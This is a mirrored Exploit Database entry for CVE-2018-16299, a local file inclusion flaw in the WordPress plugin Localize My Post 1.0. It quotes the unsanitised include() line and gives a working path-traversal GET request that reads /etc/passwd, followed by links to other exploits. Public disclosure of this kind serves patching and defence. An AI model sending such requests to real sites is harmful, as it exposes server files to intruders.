WordPress Plugin Localize My Post 1.0 – Local File Inclusion

Exploit Database
16 阅读

作者： Manuel García Cárdenas

日期： 2018-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45439/

# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299

# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" it is not sanitized allowing include local files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.

# Local File Inclusion POC:

GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

last Exploits
WordPress Plugin Localize My Post 1.0 – Local File Inclusion的更多信息

Moodle 3.11.4 – SQL Injection：
AdaptCMS Lite 1.5 – Arbitrary Add Admin：
Joomla! Component com_jdrugstopics – SQL Injection：
DotNetNuke DNNarticle Module 11 – Directory Traversal：
ViewGit 0.0.6 – Multiple Cross-Site Scripting Vulnerabilities：
PHP Web Scripts Ad Manager Pro – ‘page’ Local File Inclusion：
cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal：
PHPBoost – Arbitrary File Upload / Information Disclosure：